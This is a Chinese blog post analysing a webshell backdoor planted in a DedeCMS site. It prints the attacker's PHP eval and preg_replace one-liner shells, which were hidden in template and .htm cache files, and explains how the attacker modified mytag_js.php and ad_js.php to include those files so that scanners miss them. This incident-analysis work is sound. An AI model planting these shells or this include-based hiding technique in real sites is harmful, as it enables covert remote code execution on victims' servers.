dedecms之webshell后门分析

单位某站用的dedecms,今天被某黑阔getshell了,无奈只能打包代码进行分析,用各种webshell扫描器只扫到一个data/tplcache/xxxxx.inc文件,文件代码如下:{dede:php}file_put_contents(’90sec.php’,'<?php  eval($_POST[guige]);?>’);{/dede:php}

但是翻遍所有的Web目录也没有找到90sec.php文件,有朋友指点说可能是其它文件include这个文件。然后又用Seay的代码审计工具定义关键字各种扫,还是没找到。

最后翻到data/cache目录下发现了几个htm文件,myad-1.htm,myad-16.htm,mytag-1208.htm等,打开这些html文件,代码分别如下:

document.write(“dedecmsisok<?php  @eval($_POST[cmd]);?>”);

–>

document.write(“<?php  $fp = @fopen(‘av.php’, ‘a’);@fwrite($fp, ‘<?php eval($_POST[110]) ?>axxxxx’);echo ‘OK’;@fclose($fp);?>”);

–>

document.write(“<?php  echo ‘dedecms 5.7 0day
guige, 90sec.org’;@preg_replace(‘/[copyright]/e’,$_REQUEST[‘guige’],’error’);?>”);

–>

看到这几个文件很奇怪,不知道黑阔要干嘛??虽然代码看似很熟?,但是HTML文件能当后门用么?想起之前朋友说的include,然后结合前段时间的getshell漏洞利用细节,最终翻到plus/mytag_js.php文件,在这个文件里终于发现黑阔无节操的地方,主要代码如下:

看到上面的代码我们应该知道黑阔是多么的邪恶,在生成的htm格式的cache文件中写?各种类型的一句话代码,然后再修改plus/ad_js.php和mytag_js.php文件,包含htm格式的cache文件。这样黑阔只需要在菜刀中填入以下URL就可以连接一句话了.

http://www.nxadmin.com/plus/mytag_js.php?id=1208

http://www.nxadmin.com/plus/ad_js.php?id=1

具体的id以及文件名跟data/cache目录下的myad-1.htm,mytag-1208.htm是有关系的。因此各种webshell扫描器都没有扫到webshell后门文件,因为很多默认都不对htm进行扫描.

plusmytag_js.php,dedecms之webshell后门分析相关推荐

  1. php webshell 分析,一款奇葩的PHP Webshell后门分析

    近日,360网站卫士安全团队近期捕获一个基于PHP实现的webshell样本,其巧妙的代码动态生成方式,猥琐的自身页面伪装手法,让我们在分析这个样本的过程中感受到相当多的乐趣.接下来就让我们一同共赏这 ...

  2. 阿里云盾提醒网站被WebShell木马后门分析与对策

    收到阿里云用户朋友的反馈,说运行了一年的网站突然遭到黑客的攻击,系统cpu一直保持在100%,有进程也干不掉,然后客户就进行杀毒了,然后就把所有的exe文件都杀了,然后系统也就很多功能不正常了,数据库 ...

  3. PHP后门新玩法:一款猥琐的PHP后门分析

    近日,360网站卫士安全团队近期捕获一个基于PHP实现的webshell样本,其巧妙的代码动态生成方式,猥琐的自身页面伪装手法,让我们在分析这个样本的过程中感受到相当多的乐趣.接下来就让我们一同共赏这 ...

  4. 一款猥琐的PHP后门分析

    Webshell代码如下: <?php error_reporting(0); session_start(); header("Content-type:text/html;char ...

  5. ASP WebShell 后门脚本与免杀

    随着时间的推移和其它新型动态网页技术的兴起,使用ASP(Active Server Page)技术构建的Web应用越来越少.ASP的衰落.旧资料和链接的失效.前辈们早期对ASP较多的研究,都导致了新型 ...

  6. 在线php后门查找,一款猥琐的PHP后门分析

    近日,360网站卫士安全团队近期捕获一个基于PHP实现的webshell样本,其巧妙的代码动态生成方式,猥琐的自身页面伪装手法,让我们在分析这个样本的过程中感受到相当多的乐趣.接下来就让我们一同共赏这 ...

  7. webshell后门检测原理

    一.什么是webshell shell (计算机壳层) 在计算机科学中,Shell俗称壳(用来区别于核),是指"为使用者提供操作界面"的软件(命令解析器).它类似于DOS下的com ...

  8. java大马后门_PHP大马后门分析

    PHP大马后门分析 PHP大马 PHP大马,用php写的木马文件,一般自带提权,操作数据库,反弹shell,文件下载,端口扫描等功能.网上很多地方都能下载到这些木马,但是大部门大马都会自带有后门,也就 ...

  9. Captcha插件后门分析和修复

    0×00 前言 近日看到网上爆出wordpress官方插件captcha出现后门,大惊,本人当初千辛万苦找验证码插件,在十几个插件中选了这款,感觉还挺好用,竟然爆后门,赶紧去博客 排查,还好由于安装比 ...

最新文章

  1. NSURLCache
  2. 移动办公时代的工程行业怎么管理图像?大象云推出3D可视化整体解决方案
  3. 使用调用者权限实现Schema导向操作
  4. oracle函数lp,Oracle 执行计划的查看方式
  5. ios beta 下载_如何回滚到iOS 10(如果您使用的是iOS 11 Beta)
  6. 进度条上的小圆点怎么做_傲视网:【AE教程】如何制作环形进度条(第一讲)...
  7. java重定向代码_Java程序员经典面试题集大全 (三十四)
  8. 1.11 双向神经网络
  9. 在visual studio 2010下搭建OGRE项目
  10. [译]发布ABP v0.19包含Angular UI选项
  11. Macbook/Mac OS中阅读代码软件推荐
  12. 2015(毕业)秋季校园招聘各种企业笔试面试心得
  13. 大腿根部发黑怎么样白,变白方法
  14. 广州公布“中国制造2025”实施方案
  15. java-接口之运动员教练员综合案例
  16. First part of my Spring posts is refreshed
  17. 《F4+2—团队项目设计完善编码测试》
  18. 【如何实现RS232/485串口转CANbus总线以及介绍使用说明】
  19. c语言作业竖输出,c语言中竖怎么打
  20. 长春十一高2021年高考成绩查询时间,2021年长春各高中高考成绩排名及放榜最新消息...

热门文章

  1. Python打开公司公共盘文件夹
  2. PHP学习3:如何从数据库取出数据?看【八、实际运用】
  3. Android 仿芝麻信用进度条,Android仿支付宝上芝麻信用分雷达图
  4. ACM基本算法板子记录
  5. 数字图像处理(第三版,Rafeal C. Gonzalez, Richard E. Woods)--灰度变换与空间滤波
  6. 【图像处理】图像形态学处理系统Matlab源码
  7. 男孩和树[中英文配图]
  8. 新萝卜家园GHOST WIN7系统3专业装机版
  9. 怎么正确清理苹果产品上的脏东西,超详细教程!
  10. 九龙证券|重磅会议召开,工信部强调推进民爆行业高质量发展